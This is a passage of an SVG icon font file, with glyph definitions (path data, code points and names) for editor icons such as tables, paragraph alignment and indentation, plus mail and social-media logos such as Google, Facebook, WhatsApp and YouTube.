<glyph unicode="&#xeeb9;" glyph-name="text-color" d="M322.018 128l57.6 192h264.764l57.6-192h113.632l-191.996 640h-223.236l-192-640h113.636zM475.618 640h72.764l57.6-192h-187.964l57.6 192z" />
<glyph unicode="&#xeeba;" glyph-name="pagebreak" d="M256 576v384h768v-384h-64v320h-640v-320zM1024 384v-448h-768v448h64v-384h640v384zM512 512h128v-64h-128zM320 512h128v-64h-128zM704 512h128v-64h-128zM896 512h128v-64h-128zM0 672l192-192-192-192z" />
<glyph unicode="&#xeebb;" glyph-name="clear-formatting" d="M0 64h576v-128h-576zM896 832h-302.56l-183.764-704h-132.288l183.762 704h-269.15v128h704zM929.774-64l-129.774 129.774-129.774-129.774-62.226 62.226 129.774 129.774-129.774 129.774 62.226 62.226 129.774-129.774 129.774 129.774 62.226-62.226-129.774-129.774 129.774-129.774z" />
<glyph unicode="&#xeebc;" glyph-name="table" d="M0 768v-704h1024v704h-1024zM384 320v128h256v-128h-256zM640 256v-128h-256v128h256zM640 640v-128h-256v128h256zM320 640v-128h-256v128h256zM64 448h256v-128h-256v128zM704 448h256v-128h-256v128zM704 512v128h256v-128h-256zM64 256h256v-128h-256v128zM704 128v128h256v-128h-256z" />
<glyph unicode="&#xeebd;" glyph-name="table2" d="M0 896v-896h1024v896h-1024zM384 320v192h256v-192h-256zM640 256v-192h-256v192h256zM640 768v-192h-256v192h256zM320 768v-192h-256v192h256zM64 512h256v-192h-256v192zM704 512h256v-192h-256v192zM704 576v192h256v-192h-256zM64 256h256v-192h-256v192zM704 64v192h256v-192h-256z" />
<glyph unicode="&#xeebe;" glyph-name="insert-template" d="M384 768h128v-64h-128zM576 768h128v-64h-128zM896 768v-256h-192v64h128v128h-64v64zM320 576h128v-64h-128zM512 576h128v-64h-128zM192 704v-128h64v-64h-128v256h192v-64zM384 384h128v-64h-128zM576 384h128v-64h-128zM896 384v-256h-192v64h128v128h-64v64zM320 192h128v-64h-128zM512 192h128v-64h-128zM192 320v-128h64v-64h-128v256h192v-64zM960 896h-896v-896h896v896zM1024 960v0-1024h-1024v1024h1024z" />
<glyph unicode="&#xeebf;" glyph-name="pilcrow" d="M384 960h512v-128h-128v-896h-128v896h-128v-896h-128v512c-141.384 0-256 114.616-256 256s114.616 256 256 256z" />
<glyph unicode="&#xeec0;" glyph-name="ltr" d="M512 960c-141.384 0-256-114.616-256-256s114.616-256 256-256v-512h128v896h128v-896h128v896h128v128h-512zM0 256l256 256-256 256z" />
<glyph unicode="&#xeec1;" glyph-name="rtl" d="M256 960c-141.384 0-256-114.616-256-256s114.616-256 256-256v-512h128v896h128v-896h128v896h128v128h-512zM1024 768l-256-256 256-256z" />
<glyph unicode="&#xeec2;" glyph-name="section" d="M495.964-64c-49.36 0-91.116 14.406-124.104 42.82-33.224 28.614-50.068 62.038-50.068 99.344 0 18.128 6.6 33.756 19.622 46.458 13.232 12.914 29.782 19.744 47.85 19.744 18.002 0 34.194-6.41 46.826-18.542 12.472-11.972 18.796-27.824 18.796-47.104 0-11.318-1.85-23.818-5.494-37.146-3.616-13.178-4.376-19.938-4.376-23.292 0-3.682 0.924-8.076 7.774-12.756 12.76-8.824 28.066-13.084 46.876-13.084 22.576 0 42.718 7.858 61.574 24.022 18.578 15.942 27.612 32.318 27.612 50.056 0 19.736-5.27 36.826-16.12 52.242-18.336 25.758-52.878 55.954-102.612 89.668-79.858 53.454-133.070 99.766-162.58 141.52-22.89 32.684-34.476 67.89-34.476 104.704 0 37.062 12.142 73.948 36.092 109.63 20.508 30.554 50.8 58.12 90.228 82.138-21.096 22.7-36.896 44.064-47.094 63.688-12.872 24.76-19.398 50.372-19.398 76.122 0 47.814 18.91 89.16 56.206 122.89 37.32 33.76 83.86 50.878 138.322 50.878 50.086 0 92.206-14.082 125.182-41.852 33.328-28.082 50.222-60.898 50.222-97.54 0-18.656-6.986-35.364-20.766-49.66l-0.276-0.282c-7.976-7.924-22.618-17.37-47.046-17.37-19.148 0-35.934 6.272-48.54 18.136-12.558 11.794-18.93 25.918-18.93 41.966 0 6.934 1.702 17.416 5.352 32.98 1.778 7.364 2.668 14.142 2.668 20.25 0 10.338-3.726 18.272-11.724 24.966-8.282 6.93-20.108 10.302-36.142 10.302-24.868 0-45.282-7.562-62.41-23.118-17.19-15.606-25.544-34.088-25.544-56.508 0-20.156 4.568-36.762 13.58-49.362 17.112-23.938 46.796-49.79 88.22-76.836 84.17-54.588 142.902-104.672 174.518-148.826 23.35-33.12 35.152-68.34 35.152-104.792 0-36.598-11.882-73.496-35.318-109.676-20.208-31.18-50.722-59.276-90.884-83.71 22.178-23.466 37.812-44.042 47.554-62.538 12.082-22.97 18.208-48.048 18.208-74.542 0-49.664-18.926-91.862-56.244-125.422-37.34-33.554-83.866-50.566-138.288-50.566zM446.416 603.654c-48.222-28.952-71.712-62.19-71.712-101.314 0-22.756 6.498-43.13 19.86-62.278 19.936-27.926 59.27-62.054 116.804-101.288 24.358-16.586 46.36-32.712 65.592-48.060 49.060 29.504 72.956 62.366 72.956 100.178 0 20.598-8.142 42.774-24.204 65.916-16.808 24.196-52.85 55.796-107.128 93.914-28.328 19.562-52.558 37.334-72.168 52.932z" />
<glyph unicode="&#xeec3;" glyph-name="paragraph-left" d="M0 896h1024v-128h-1024zM0 704h640v-128h-640zM0 320h640v-128h-640zM0 512h1024v-128h-1024zM0 128h1024v-128h-1024z" />
<glyph unicode="&#xeec4;" glyph-name="paragraph-center" d="M0 896h1024v-128h-1024zM192 704h640v-128h-640zM192 320h640v-128h-640zM0 512h1024v-128h-1024zM0 128h1024v-128h-1024z" />
<glyph unicode="&#xeec5;" glyph-name="paragraph-right" d="M0 896h1024v-128h-1024zM384 704h640v-128h-640zM384 320h640v-128h-640zM0 512h1024v-128h-1024zM0 128h1024v-128h-1024z" />
<glyph unicode="&#xeec6;" glyph-name="paragraph-justify" d="M0 896h1024v-128h-1024zM0 704h1024v-128h-1024zM0 512h1024v-128h-1024zM0 320h1024v-128h-1024zM0 128h1024v-128h-1024z" />
<glyph unicode="&#xeec7;" glyph-name="indent-increase" d="M0 896h1024v-128h-1024zM384 704h640v-128h-640zM384 512h640v-128h-640zM384 320h640v-128h-640zM0 128h1024v-128h-1024zM0 256v384l256-192z" />
<glyph unicode="&#xeec8;" glyph-name="indent-decrease" d="M0 896h1024v-128h-1024zM384 704h640v-128h-640zM384 512h640v-128h-640zM384 320h640v-128h-640zM0 128h1024v-128h-1024zM256 640v-384l-256 192z" />
<glyph unicode="&#xeec9;" glyph-name="share" d="M256 320c0 0 58.824 192 384 192v-192l384 256-384 256v-192c-256 0-384-159.672-384-320zM704 192h-576v384h125.876c10.094 11.918 20.912 23.334 32.488 34.18 43.964 41.19 96.562 72.652 156.114 93.82h-442.478v-640h832v268.624l-128-85.334v-55.29z" />
<glyph unicode="&#xeeca;" glyph-name="new-tab" d="M192 896v-768h768v768h-768zM896 192h-640v640h640v-640zM128 64v672l-64 64v-800h800l-64 64h-672zM352 704l160-160-192-192 96-96 192 192 160-160v416z" />
<glyph unicode="&#xeecb;" glyph-name="embed" d="M576 224l96-96 320 320-320 320-96-96 224-224zM448 672l-96 96-320-320 320-320 96 96-224 224z" />
<glyph unicode="&#xeecc;" glyph-name="embed2" horiz-adv-x="1280" d="M832 224l96-96 320 320-320 320-96-96 224-224zM448 672l-96 96-320-320 320-320 96 96-224 224zM701.298 809.481l69.468-18.944-191.987-704.026-69.468 18.944 191.987 704.026z" />
<glyph unicode="&#xeecd;" glyph-name="terminal" d="M0 896v-896h1024v896h-1024zM960 64h-896v768h896v-768zM896 768h-768v-640h768v640zM448 448h-64v-64h-64v-64h-64v64h64v64h64v64h-64v64h-64v64h64v-64h64v-64h64v-64zM704 320h-192v64h192v-64z" />
<glyph unicode="&#xeece;" glyph-name="share2" d="M864 256c-45.16 0-85.92-18.738-115.012-48.83l-431.004 215.502c1.314 8.252 2.016 16.706 2.016 25.328s-0.702 17.076-2.016 25.326l431.004 215.502c29.092-30.090 69.852-48.828 115.012-48.828 88.366 0 160 71.634 160 160s-71.634 160-160 160-160-71.634-160-160c0-8.622 0.704-17.076 2.016-25.326l-431.004-215.504c-29.092 30.090-69.852 48.83-115.012 48.83-88.366 0-160-71.636-160-160 0-88.368 71.634-160 160-160 45.16 0 85.92 18.738 115.012 48.828l431.004-215.502c-1.312-8.25-2.016-16.704-2.016-25.326 0-88.368 71.634-160 160-160s160 71.632 160 160c0 88.364-71.634 160-160 160z" />
<glyph unicode="&#xeecf;" glyph-name="mail" d="M853.31 960h-682.62c-93.88 0-170.69-76.784-170.69-170.658v-682.656c0-93.876 76.81-170.686 170.69-170.686h682.622c93.938 0 170.688 76.81 170.688 170.686v682.656c0 93.874-76.75 170.658-170.69 170.658zM256 704h512c9.138 0 18.004-1.962 26.144-5.662l-282.144-329.168-282.144 329.17c8.14 3.696 17.006 5.66 26.144 5.66zM192 256v384c0 1.34 0.056 2.672 0.14 4l187.664-218.94-185.598-185.6c-1.444 5.338-2.206 10.886-2.206 16.54zM768 192h-512c-5.654 0-11.202 0.762-16.54 2.206l182.118 182.118 90.422-105.496 90.424 105.494 182.116-182.118c-5.34-1.442-10.886-2.204-16.54-2.204zM832 256c0-5.654-0.762-11.2-2.206-16.54l-185.598 185.598 187.664 218.942c0.084-1.328 0.14-2.66 0.14-4v-384z" />
<glyph unicode="&#xeed0;" glyph-name="mail2" d="M853.342 960h-682.656c-93.874 0-170.686-76.81-170.686-170.69v-682.622c0-93.938 76.812-170.688 170.686-170.688h682.656c93.876 0 170.658 76.75 170.658 170.69v682.62c0 93.88-76.782 170.69-170.658 170.69zM853.342 832c7.988 0 15.546-2.334 22.020-6.342l-363.362-300.404-363.354 300.4c6.478 4.010 14.044 6.346 22.040 6.346h682.656zM170.686 64c-1.924 0-3.82 0.146-5.684 0.408l225.626 312.966-29.256 29.254-233.372-233.37v611.138l384-464.396 384 464.394v-611.136l-233.372 233.37-29.254-29.254 225.628-312.968c-1.858-0.26-3.746-0.406-5.662-0.406h-682.654z" />
<glyph unicode="&#xeed1;" glyph-name="mail3" d="M853.342 960h-682.656c-93.874 0-170.686-76.81-170.686-170.69v-682.622c0-93.938 76.812-170.688 170.686-170.688h682.656c93.876 0 170.658 76.75 170.658 170.69v682.62c0 93.88-76.782 170.69-170.658 170.69zM182.628 73.374l-77.256 77.254 256 256 29.256-29.254-208-304zM153.372 761.372l29.256 29.256 329.372-265.374 329.374 265.374 29.254-29.256-358.628-422.626-358.628 422.626zM841.374 73.374l-208 304 29.254 29.254 256-256-77.254-77.254z" />
<glyph unicode="&#xeed2;" glyph-name="mail4" d="M512 960c-282.77 0-512-229.23-512-512s229.23-512 512-512 512 229.23 512 512-229.23 512-512 512zM256 704h512c9.138 0 18.004-1.962 26.144-5.662l-282.144-329.168-282.144 329.17c8.14 3.696 17.006 5.66 26.144 5.66zM192 256v384c0 1.34 0.056 2.672 0.14 4l187.664-218.942-185.598-185.598c-1.444 5.336-2.206 10.886-2.206 16.54zM768 192h-512c-5.654 0-11.202 0.762-16.54 2.208l182.118 182.118 90.422-105.498 90.424 105.494 182.116-182.12c-5.34-1.44-10.886-2.202-16.54-2.202zM832 256c0-5.654-0.762-11.2-2.206-16.54l-185.6 185.598 187.666 218.942c0.084-1.328 0.14-2.66 0.14-4v-384z" />
<glyph unicode="&#xeed3;" glyph-name="amazon" d="M925.6 74.8c-112.2-82.8-274.6-126.8-414.6-126.8-196.2 0-372.8 72.4-506.4 193.2-10.4 9.4-1.2 22.4 11.4 15 144.2-84 322.6-134.4 506.8-134.4 124.2 0 260.8 25.8 386.6 79.2 18.8 8 34.8-12.6 16.2-26.2zM972.2 128c-14.4 18.4-94.8 8.8-131 4.4-11-1.2-12.6 8.2-2.8 15.2 64.2 45 169.4 32 181.6 17 12.4-15.2-3.2-120.6-63.4-171-9.2-7.8-18-3.6-14 6.6 13.8 33.8 44 109.4 29.6 127.8zM707.4 202.4l0.2-0.2c24.8 21.8 69.4 60.8 94.6 81.8 10 8 8.2 21.4 0.4 32.6-22.6 31.2-46.6 56.6-46.6 114.2v192c0 81.4 5.6 156-54.2 212-47.2 45.2-125.6 61.2-185.6 61.2-117.2 0-248-43.8-275.4-188.6-3-15.4 8.4-23.6 18.4-25.8l119.4-13c11.2 0.6 19.2 11.6 21.4 22.8 10.2 49.8 52 74 99 74 25.4 0 54.2-9.2 69.2-32 17.2-25.4 15-60 15-89.4v-16c-71.4-8-164.8-13.2-231.6-42.6-77.2-33.4-131.4-101.4-131.4-201.4 0-128 80.6-192 184.4-192 87.6 0 135.4 20.6 203 89.8 22.4-32.4 29.6-48.2 70.6-82.2 9.4-5 21-4.6 29.2 2.8zM583.2 502.8c0-48 1.2-88-23-130.6-19.6-34.8-50.6-56-85.2-56-47.2 0-74.8 36-74.8 89.2 0 105 94.2 124 183.2 124v-26.6z" />
<glyph unicode="&#xeed4;" glyph-name="google" d="M522.2 521.2v-175.6h290.4c-11.8-75.4-87.8-220.8-290.4-220.8-174.8 0-317.4 144.8-317.4 323.2s142.6 323.2 317.4 323.2c99.4 0 166-42.4 204-79l139 133.8c-89.2 83.6-204.8 134-343 134-283 0-512-229-512-512s229-512 512-512c295.4 0 491.6 207.8 491.6 500.2 0 33.6-3.6 59.2-8 84.8l-483.6 0.2z" />
<glyph unicode="&#xeed5;" glyph-name="google2" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM519.6 64c-212.2 0-384 171.8-384 384s171.8 384 384 384c103.6 0 190.4-37.8 257.2-100.4l-104.2-100.4c-28.6 27.4-78.4 59.2-153 59.2-131.2 0-238-108.6-238-242.4s107-242.4 238-242.4c152 0 209 109.2 217.8 165.6h-217.8v131.6h362.6c3.2-19.2 6-38.4 6-63.6 0.2-219.4-146.8-375.2-368.6-375.2z" />
<glyph unicode="&#xeed6;" glyph-name="google3" d="M512 960c-282.8 0-512-229.2-512-512s229.2-512 512-512 512 229.2 512 512-229.2 512-512 512zM519.6 64c-212.2 0-384 171.8-384 384s171.8 384 384 384c103.6 0 190.4-37.8 257.2-100.4l-104.2-100.4c-28.6 27.4-78.4 59.2-153 59.2-131.2 0-238-108.6-238-242.4s107-242.4 238-242.4c152 0 209 109.2 217.8 165.6h-217.8v131.6h362.6c3.2-19.2 6-38.4 6-63.6 0.2-219.4-146.8-375.2-368.6-375.2z" />
<glyph unicode="&#xeed7;" glyph-name="google-plus" d="M325.8 502.6v-111.8h184.8c-7.4-48-55.8-140.6-184.8-140.6-111.2 0-202 92.2-202 205.8s90.8 205.8 202 205.8c63.4 0 105.6-27 129.8-50.2l88.4 85.2c-56.8 53-130.4 85.2-218.2 85.2-180.2-0.2-325.8-145.8-325.8-326s145.6-325.8 325.8-325.8c188 0 312.8 132.2 312.8 318.4 0 21.4-2.4 37.8-5.2 54h-307.6zM1024 512h-96v96h-96v-96h-96v-96h96v-96h96v96h96z" />
<glyph unicode="&#xeed8;" glyph-name="google-plus2" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM384 192c-141.6 0-256 114.4-256 256s114.4 256 256 256c69.2 0 127-25.2 171.6-67l-69.6-66.8c-19 18.2-52.2 39.4-102 39.4-87.4 0-158.8-72.4-158.8-161.6s71.4-161.6 158.8-161.6c101.4 0 139.4 72.8 145.2 110.4h-145.2v87.8h241.8c2.2-12.8 4-25.6 4-42.4 0-146.4-98-250.2-245.8-250.2zM896 448h-64v-64h-64v64h-64v64h64v64h64v-64h64v-64z" />
<glyph unicode="&#xeed9;" glyph-name="google-plus3" d="M512 960c-282.8 0-512-229.2-512-512s229.2-512 512-512 512 229.2 512 512-229.2 512-512 512zM384 192c-141.6 0-256 114.4-256 256s114.4 256 256 256c69.2 0 127-25.2 171.6-67l-69.6-66.8c-19 18.2-52.2 39.4-102 39.4-87.4 0-158.8-72.4-158.8-161.6s71.4-161.6 158.8-161.6c101.4 0 139.4 72.8 145.2 110.4h-145.2v87.8h241.8c2.2-12.8 4-25.6 4-42.4 0-146.4-98-250.2-245.8-250.2zM832 448v-64h-64v64h-64v64h64v64h64v-64h64v-64h-64z" />
<glyph unicode="&#xeeda;" glyph-name="hangouts" d="M511.8 960c-244.2 0-442.2-198-442.2-442.2 0-231.4 210.8-419 442.2-419v-162.8c268.6 136.2 442.6 355.6 442.6 581.8 0 244.2-198.4 442.2-442.6 442.2zM448 448c0-53-28.6-96-64-96v96h-128v192h192v-192zM768 448c0-53-28.6-96-64-96v96h-128v192h192v-192z" />
<glyph unicode="&#xeedb;" glyph-name="google-drive" d="M438 320l-184.6-320h580.6l184.6 320zM992.4 384l-295.6 512h-369.6l295.6-512zM290.2 832l-290.2-502.8 184.8-320 290.2 502.8z" />
<glyph unicode="&#xeedc;" glyph-name="facebook" d="M608 768h160v192h-160c-123.514 0-224-100.486-224-224v-96h-128v-192h128v-512h192v512h160l32 192h-192v96c0 17.346 14.654 32 32 32z" />
<glyph unicode="&#xeedd;" glyph-name="facebook2" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h416v448h-128v128h128v64c0 105.8 86.2 192 192 192h128v-128h-128c-35.2 0-64-28.8-64-64v-64h192l-32-128h-160v-448h288c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96z" />
<glyph unicode="&#xeede;" glyph-name="instagram" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM704 800c0 17.6 14.4 32 32 32h128c17.6 0 32-14.4 32-32v-128c0-17.6-14.4-32-32-32h-128c-17.6 0-32 14.4-32 32v128zM512 640c106 0 192-86 192-192s-86-192-192-192c-106 0-192 86-192 192s86 192 192 192zM896 96v0c0-17.6-14.4-32-32-32h-704c-17.6 0-32 14.4-32 32v0 416h70.4c-4.2-20.6-6.4-42-6.4-64 0-176.8 143.2-320 320-320s320 143.2 320 320c0 22-2.2 43.4-6.4 64h70.4v-416z" />
<glyph unicode="&#xeedf;" glyph-name="whatsapp" d="M873 811.2c-95.8 96-223.2 148.8-359 148.8-279.6 0-507.2-227.6-507.2-507.4 0-89.4 23.4-176.8 67.8-253.6l-72-263 269 70.6c74.2-40.4 157.6-61.8 242.4-61.8h0.2c0 0 0 0 0 0 279.6 0 507.4 227.6 507.4 507.4 0 135.6-52.8 263-148.6 359zM514.2 30.4v0c-75.8 0-150 20.4-214.8 58.8l-15.4 9.2-159.6-41.8 42.6 155.6-10 16c-42.4 67-64.6 144.6-64.6 224.4 0 232.6 189.2 421.8 422 421.8 112.6 0 218.6-44 298.2-123.6 79.6-79.8 123.4-185.6 123.4-298.4-0.2-232.8-189.4-422-421.8-422zM745.4 346.4c-12.6 6.4-75 37-86.6 41.2s-20 6.4-28.6-6.4c-8.4-12.6-32.8-41.2-40.2-49.8-7.4-8.4-14.8-9.6-27.4-3.2s-53.6 19.8-102 63c-37.6 33.6-63.2 75.2-70.6 87.8s-0.8 19.6 5.6 25.8c5.8 5.6 12.6 14.8 19 22.2s8.4 12.6 12.6 21.2c4.2 8.4 2.2 15.8-1 22.2s-28.6 68.8-39 94.2c-10.2 24.8-20.8 21.4-28.6 21.8-7.4 0.4-15.8 0.4-24.2 0.4s-22.2-3.2-33.8-15.8c-11.6-12.6-44.4-43.4-44.4-105.8s45.4-122.6 51.8-131.2c6.4-8.4 89.4-136.6 216.6-191.4 30.2-13 53.8-20.8 72.2-26.8 30.4-9.6 58-8.2 79.8-5 24.4 3.6 75 30.6 85.6 60.2s10.6 55 7.4 60.2c-3 5.6-11.4 8.8-24.2 15.2z" />
<glyph unicode="&#xeee0;" glyph-name="spotify" d="M512 960c-281.6 0-512-230.4-512-512s230.4-512 512-512 512 230.4 512 512-227.8 512-512 512zM747.6 220.2c-10.2-15.4-28.2-20.4-43.6-10.2-120.4 74.2-271.4 89.6-450.6 48.6-18-5.2-33.2 7.6-38.4 23-5.2 18 7.6 33.2 23 38.4 194.6 43.6 363.6 25.6 496.6-56.4 18-7.6 20.6-28 13-43.4zM809 361c-12.8-18-35.8-25.6-53.8-12.8-138.2 84.4-348.2 110-509.4 58.8-20.4-5.2-43.6 5.2-48.6 25.6-5.2 20.4 5.2 43.6 25.6 48.6 186.8 56.4 417.2 28.2 576-69.2 15.2-7.6 23-33.2 10.2-51zM814 504.4c-163.8 97.2-437.8 107.6-594 58.8-25.6-7.6-51.2 7.6-58.8 30.8-7.6 25.6 7.6 51.2 30.8 58.8 181.8 53.8 481.2 43.6 670.8-69.2 23-12.8 30.8-43.6 18-66.6-13-17.8-43.6-25.4-66.8-12.6z" />
<glyph unicode="&#xeee1;" glyph-name="telegram" d="M512 960c-282.8 0-512-229.2-512-512s229.2-512 512-512 512 229.2 512 512-229.2 512-512 512zM763.6 609l-84-395.8c-5.8-28.2-22.8-34.8-46.4-21.8l-128 94.6-61.4-59.8c-7.2-7-12.8-12.8-25.6-12.8-16.6 0-13.8 6.2-19.4 22l-43.6 143.2-126.6 39.4c-27.4 8.4-27.6 27.2 6.2 40.6l493.2 190.4c22.4 10.2 44.2-5.4 35.6-40z" />
<glyph unicode="&#xeee2;" glyph-name="twitter" d="M1024 733.6c-37.6-16.8-78.2-28-120.6-33 43.4 26 76.6 67.2 92.4 116.2-40.6-24-85.6-41.6-133.4-51-38.4 40.8-93 66.2-153.4 66.2-116 0-210-94-210-210 0-16.4 1.8-32.4 5.4-47.8-174.6 8.8-329.4 92.4-433 219.6-18-31-28.4-67.2-28.4-105.6 0-72.8 37-137.2 93.4-174.8-34.4 1-66.8 10.6-95.2 26.2 0-0.8 0-1.8 0-2.6 0-101.8 72.4-186.8 168.6-206-17.6-4.8-36.2-7.4-55.4-7.4-13.6 0-26.6 1.4-39.6 3.8 26.8-83.4 104.4-144.2 196.2-146-72-56.4-162.4-90-261-90-17 0-33.6 1-50.2 3 93.2-59.8 203.6-94.4 322.2-94.4 386.4 0 597.8 320.2 597.8 597.8 0 9.2-0.2 18.2-0.6 27.2 41 29.4 76.6 66.4 104.8 108.6z" />
<glyph unicode="&#xeee3;" glyph-name="vine" d="M960.8 451c-26.4-6-51.8-8.8-74.8-8.8-129.2 0-228.6 90.2-228.6 247.2 0 77 29.8 116.8 71.8 116.8 40 0 66.6-35.8 66.6-108.6 0-41.4-11-86.8-19.2-113.6 0 0 39.8-69.4 148.6-48.2 23.2 51.4 35.6 117.8 35.6 176 0 156.8-80 248.2-226.6 248.2-150.8 0-239-115.8-239-268.6 0-151.4 70.8-281.2 187.4-340.4-49-98.2-111.4-184.6-176.6-249.8-118 142.8-224.8 333.2-268.6 705h-174.2c80.6-619.2 320.4-816.4 384-854.2 35.8-21.6 66.8-20.6 99.6-2 51.6 29.2 206.2 184 292 365 36 0 79.2 4.2 122.2 14v122z" />
<glyph unicode="&#xeee4;" glyph-name="vk" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM829.4 243.2l-93.6-1.4c0 0-20.2-4-46.6 14.2-35 24-68 86.6-93.8 78.4-26-8.2-25.2-64.4-25.2-64.4s0.2-12-5.8-18.4c-6.4-7-19.2-8.4-19.2-8.4h-41.8c0 0-92.4-5.6-173.8 79.2-88.8 92.4-167.2 275.8-167.2 275.8s-4.6 12 0.4 17.8c5.6 6.6 20.6 7 20.6 7l100.2 0.6c0 0 9.4-1.6 16.2-6.6 5.6-4 8.6-11.8 8.6-11.8s16.2-41 37.6-78c41.8-72.2 61.4-88 75.6-80.4 20.6 11.2 14.4 102.2 14.4 102.2s0.4 33-10.4 47.6c-8.4 11.4-24.2 14.8-31 15.6-5.6 0.8 3.6 13.8 15.6 19.8 18 8.8 49.8 9.4 87.4 9 29.2-0.2 37.8-2.2 49.2-4.8 34.6-8.4 22.8-40.6 22.8-117.8 0-24.8-4.4-59.6 13.4-71 7.6-5 26.4-0.8 73.4 79 22.2 37.8 39 82.2 39 82.2s3.6 8 9.2 11.4c5.8 3.4 13.6 2.4 13.6 2.4l105.4 0.6c0 0 31.6 3.8 36.8-10.6 5.4-15-11.8-50-54.8-107.4-70.6-94.2-78.6-85.4-19.8-139.8 56-52 67.6-77.4 69.6-80.6 22.8-38.4-26-41.4-26-41.4z" />
<glyph unicode="&#xeee5;" glyph-name="renren" d="M425.2 949.4c-241.2-40.6-425.2-250.4-425.2-503.2 0-125.6 45.6-240.6 120.8-329.6 178.6 86.4 303.6 282 304.4 509.8v323zM598.8 949.4c241.2-40.6 425.2-250.4 425.2-503.2 0-125.6-45.6-240.6-120.8-329.6-178.6 86.4-303.6 282-304.4 509.8v323zM510.2 317.4c-31.8-131.6-126.8-244-245-318.8 72.8-39.8 156.2-62.6 245-62.6s172.2 22.8 245 62.6c-118.2 74.8-213.2 187.2-245 318.8z" />
<glyph unicode="&#xeee6;" glyph-name="sina-weibo" d="M430.2 62c-169.6-16.8-316 60-327 171.2-11 111.4 117.6 215 287 231.8 169.6 16.8 316-60 326.8-171.2 11.2-111.4-117.4-215.2-286.8-231.8zM769.2 431.4c-14.4 4.4-24.4 7.2-16.8 26.2 16.4 41.2 18 76.6 0.2 102-33.2 47.4-124.2 45-228.4 1.2 0 0-32.8-14.2-24.4 11.6 16 51.6 13.6 94.6-11.4 119.6-56.6 56.6-207-2.2-336-131.2-96.4-96.2-152.4-198.8-152.4-287.4 0-169.2 217.2-272.2 429.6-272.2 278.4 0 463.8 161.8 463.8 290.2 0 77.8-65.4 121.8-124.2 140zM954.2 741.4c-67.2 74.6-166.4 103-258 83.6v0c-21.2-4.6-34.6-25.4-30-46.4 4.6-21.2 25.2-34.6 46.4-30 65.2 13.8 135.6-6.4 183.4-59.4s60.8-125.2 40.2-188.4v0c-6.6-20.6 4.6-42.6 25.2-49.4 20.6-6.6 42.6 4.6 49.4 25.2v0.2c28.8 88.4 10.6 190-56.6 264.6zM850.8 648c-32.8 36.4-81.2 50.2-125.6 40.6-18.2-3.8-29.8-22-26-40.2 4-18.2 22-29.8 40-25.8v0c21.8 4.6 45.4-2.2 61.4-19.8 16-17.8 20.4-42 13.4-63.2v0c-5.6-17.6 4-36.8 21.8-42.6 17.8-5.6 36.8 4 42.6 21.8 14 43.4 5.2 93-27.6 129.2zM439.6 263.4c-6-10.2-19-15-29.2-10.8-10.2 4-13.2 15.6-7.4 25.4 6 9.8 18.6 14.6 28.6 10.8 10-3.6 13.6-15 8-25.4zM385.4 194.2c-16.4-26.2-51.6-37.6-78-25.6-26 11.8-33.8 42.2-17.4 67.8 16.2 25.4 50.2 36.8 76.4 25.8 26.6-11.4 35.2-41.6 19-68zM447 379.4c-80.6 21-171.8-19.2-206.8-90.2-35.8-72.4-1.2-153 80.2-179.4 84.4-27.2 184 14.6 218.6 92.6 34.2 76.6-8.4 155.2-92 177z" />
<glyph unicode="&#xeee7;" glyph-name="rss" d="M136.294 209.070c-75.196 0-136.292-61.334-136.292-136.076 0-75.154 61.1-135.802 136.292-135.802 75.466 0 136.494 60.648 136.494 135.802-0.002 74.742-61.024 136.076-136.494 136.076zM0.156 612.070v-196.258c127.784 0 247.958-49.972 338.458-140.512 90.384-90.318 140.282-211.036 140.282-339.3h197.122c-0.002 372.82-303.282 676.070-675.862 676.070zM0.388 960v-196.356c455.782 0 826.756-371.334 826.756-827.644h196.856c0 564.47-459.254 1024-1023.612 1024z" />
<glyph unicode="&#xeee8;" glyph-name="rss2" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM279 128.8c-48 0-87 38.6-87 86.6 0 47.6 39 86.8 87 86.8 48.2 0 87-39.2 87-86.8 0-48-39-86.6-87-86.6zM497.4 128c0 81.8-31.8 158.8-89.4 216.4-57.8 57.8-134.4 89.6-216 89.6v125.2c237.6 0 431.2-193.4 431.2-431.2h-125.8zM719.6 128c0 291-236.6 528-527.4 528v125.2c360 0 653-293.2 653-653.2h-125.6z" />
<glyph unicode="&#xeee9;" glyph-name="youtube" d="M1013.8 652.8c0 0-10 70.6-40.8 101.6-39 40.8-82.6 41-102.6 43.4-143.2 10.4-358.2 10.4-358.2 10.4h-0.4c0 0-215 0-358.2-10.4-20-2.4-63.6-2.6-102.6-43.4-30.8-31-40.6-101.6-40.6-101.6s-10.2-82.8-10.2-165.8v-77.6c0-82.8 10.2-165.8 10.2-165.8s10-70.6 40.6-101.6c39-40.8 90.2-39.4 113-43.8 82-7.8 348.2-10.2 348.2-10.2s215.2 0.4 358.4 10.6c20 2.4 63.6 2.6 102.6 43.4 30.8 31 40.8 101.6 40.8 101.6s10.2 82.8 10.2 165.8v77.6c-0.2 82.8-10.4 165.8-10.4 165.8zM406.2 315.2v287.8l276.6-144.4-276.6-143.4z" />
